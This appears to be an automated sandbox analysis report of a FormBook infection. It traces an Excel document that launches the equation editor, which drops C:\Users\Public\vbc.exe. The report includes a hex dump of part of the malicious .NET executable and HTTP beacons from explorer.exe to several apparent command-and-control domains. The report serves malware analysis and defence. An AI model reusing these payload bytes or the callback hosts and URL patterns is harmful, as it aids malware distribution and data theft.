                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 63 bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 da 0c 00 00 08 00 00 00 00 00 00 ce f8 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 f8 0c 00 4b 00 00 00 00 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 d8 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0d 00 00 06 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f8 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 3e 0b 00 88 b9 01 00 03 00 00 00 43 01 00 06 68 36 02 00 90 08 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 2b 02 26 16 02 28 01 00 00 0a 2a 36 2b 02 26 16 00 02 28 04 00 00 0a 00 2a 00 00 13 30 03 00 12 01 00 00 01 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 2b f3 88 0a 20 96 b2 41 ee 58 20 2a a0 25 08 59 20 87 05 a5 f0 61 20 02 00 00 00 63 3b 68 00 00 00 fe 0c 00 00 20 e1 68 eb e3 20 e9 68 eb e3 61 59 45 04 00 00 00 5f 00 00 00 2a 00 00 00 a1 00 00 00 52 00 00 00 fe 0c 00 00 20 fe 73 c8 26 65 20 66 8c 37 d9 59 20 02 00 00 00 63 66 59 45 02 00 00 00 64 00 00 00 4c 00 00 00 38 77 00 00 00 20 44 78 c5 1e 65 20 23 a7 e4 e1 61 20 5d df 21 ff 58 20 01 00 00 00 63 2a 20 2b 0e 54 1b 65 66 65 20 db f1 ab e4 59 2a 20 0b 00 00 00 66 20 01 00 00 00 63 2a 20 c7 ef eb 2e 20 ce c8 4e 09 59 20 06 d9 62 da 58 2a 20 03 49 7e 12 20 2a 68 99 eb 61 20 e1 4d dc dc 58 20 f2 90 3c 29 61 2a 20 18 75 52 ea 20 65 ff c1 fc 59 20 3e 39 9f 0f 61 20 9c 4c 0f e2 59 2a 20 19 b6 66 1f 20 98 fb 6f 12 59 20 da c0 ea e1 61 20 2f a3 db 09 58 20 8b 1d f8 f6 59 2a 00 00 13 30 02 00 e9 00 00 00 02 00 00 11 2b 02 26 16 00 73 06 00 00 0a 80 01 00 00 04 2b 46 06 1f 21 61 0a 2b 0f 07 1f 26 61 38 a7 00 00 00 07 1f 26 58 2b 40 1f 17 28 3d 00 00 06 0b 2b e7 06 1f 2e 59 45 06 00 00 00 38 00 00 00 4a 00 00 00 5c 00 00 00 6e 00 00 00 84 00 00 00 96 00 00 00 1f fd 0b 2b c1 1f 13
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc_P @ @@K H.text `.rsrc@@.reloc @BH>Ch6.+&(*6+&(*0 + AX *%Y a c;h h haYE_*R s&e f7Y cfYEdL8w Dxe #a ]!X c* +Tefe Y* f c* . NY bX* I~ *ha MX <)a* uR eY >9a LY* f oY a /X Y*0+&s+F!a+&a8&X+@(=+.YE8J\n+


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:18:46.362503052 CET896OUTGET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1
                                                                                                                                                          Host: www.gdsjgf.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:18:46.505367994 CET896INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:18:46 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 275
                                                                                                                                                          ETag: "5ffc838f-113"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.224916735.246.6.10980C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:18:51.650290012 CET897OUTGET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1
                                                                                                                                                          Host: www.thepoetrictedstudio.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:18:51.764666080 CET898INHTTP/1.1 301 Moved Permanently
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:18:51 GMT
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Connection: close
                                                                                                                                                          location: https://www.thepoetrictedstudio.com/bw82?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G%2FZSF%2F%2F8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg%3D%3D
                                                                                                                                                          strict-transport-security: max-age=120
                                                                                                                                                          x-wix-request-id: 1610554731.697213906798116351
                                                                                                                                                          Age: 0
                                                                                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                                                                                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVj1ELE/lLKFr64HWuKhttT6,2d58ifebGbosy5xc+FRalrPbNrLr/ZtO31LD87Zthe126WDD8o9ZiHxHjBUuCAelGgqFbFMYwiXnFojPwdof6MAtvdQKQ4UViTbgkd6B4HQ=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,l7Ey5khejq81S7sxGe5Nk0OLkV42e4Sos6vJ9PulJHGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,ywkbhDzHLtjhjmon1ohv942vcDqd9yFUNOGqkGQj/jyb1qw14fPlsJ3/2N4iWrg7iy9RDN50yNDYuMRjpFglRg==
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Expires: -1
                                                                                                                                                          Server: Pepyaka/1.19.0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          3192.168.2.224916854.254.26.9480C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:18:57.357280016 CET899OUTGET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1
                                                                                                                                                          Host: www.tuvandadayvitos24h.online
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:18:57.540673018 CET900INHTTP/1.1 301 Moved Permanently
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:18:57 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 166
                                                                                                                                                          Connection: close
                                                                                                                                                          Location: https://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf-
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          4192.168.2.2249169199.34.228.7380C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:19:07.912416935 CET901OUTGET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1
                                                                                                                                                          Host: www.acdfr.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:19:08.103316069 CET902INHTTP/1.1 404 Not Found
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:19:08 GMT
                                                                                                                                                          Server: Apache
                                                                                                                                                          Set-Cookie: is_mobile=0; path=/; domain=www.acdfr.com
                                                                                                                                                          Vary: X-W-SSL,User-Agent
                                                                                                                                                          Set-Cookie: language=en; expires=Wed, 27-Jan-2021 16:19:08 GMT; Max-Age=1209600; path=/
                                                                                                                                                          Cache-Control: private
                                                                                                                                                          X-Host: pages20.sf2p.intern.weebly.net
                                                                                                                                                          X-UA-Compatible: IE=edge,chrome=1
                                                                                                                                                          Content-Length: 3803
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 31 30 34 37 39 38 34 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73
                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><script src="/gdpr/gdprscript.js?buildTime=1610479848"></script><title>404 - Page Not Found</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noarchive" /><link rel="shortcut icon" href="//cdn1.editmysite.com/developer/none.ico" /><style type="text/css">@font-face {font-family: 'Proxima Nova';font-weight: 300;src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot");src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot?#iefix") format("embedded-opentype"), url("//cdn2.editmysite.com/components/ui-framework/fonts


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          5192.168.2.224917094.73.146.4280C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:19:13.315119028 CET906OUTGET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1
                                                                                                                                                          Host: www.h2oturkiye.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:19:13.394834995 CET907INHTTP/1.1 404 Not Found
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 1237
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:19:13 GMT
                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised tha


                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:16:49
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13f510000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:09
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:11
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                                          File size:844800 bytes
                                                                                                                                                          MD5 hash:6A763ED09B2FD9F663BCB0AF7B17D492
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:17
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                                          File size:844800 bytes
                                                                                                                                                          MD5 hash:6A763ED09B2FD9F663BCB0AF7B17D492
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:17:18
                                                                                                                                                          Start date:13/01/2021
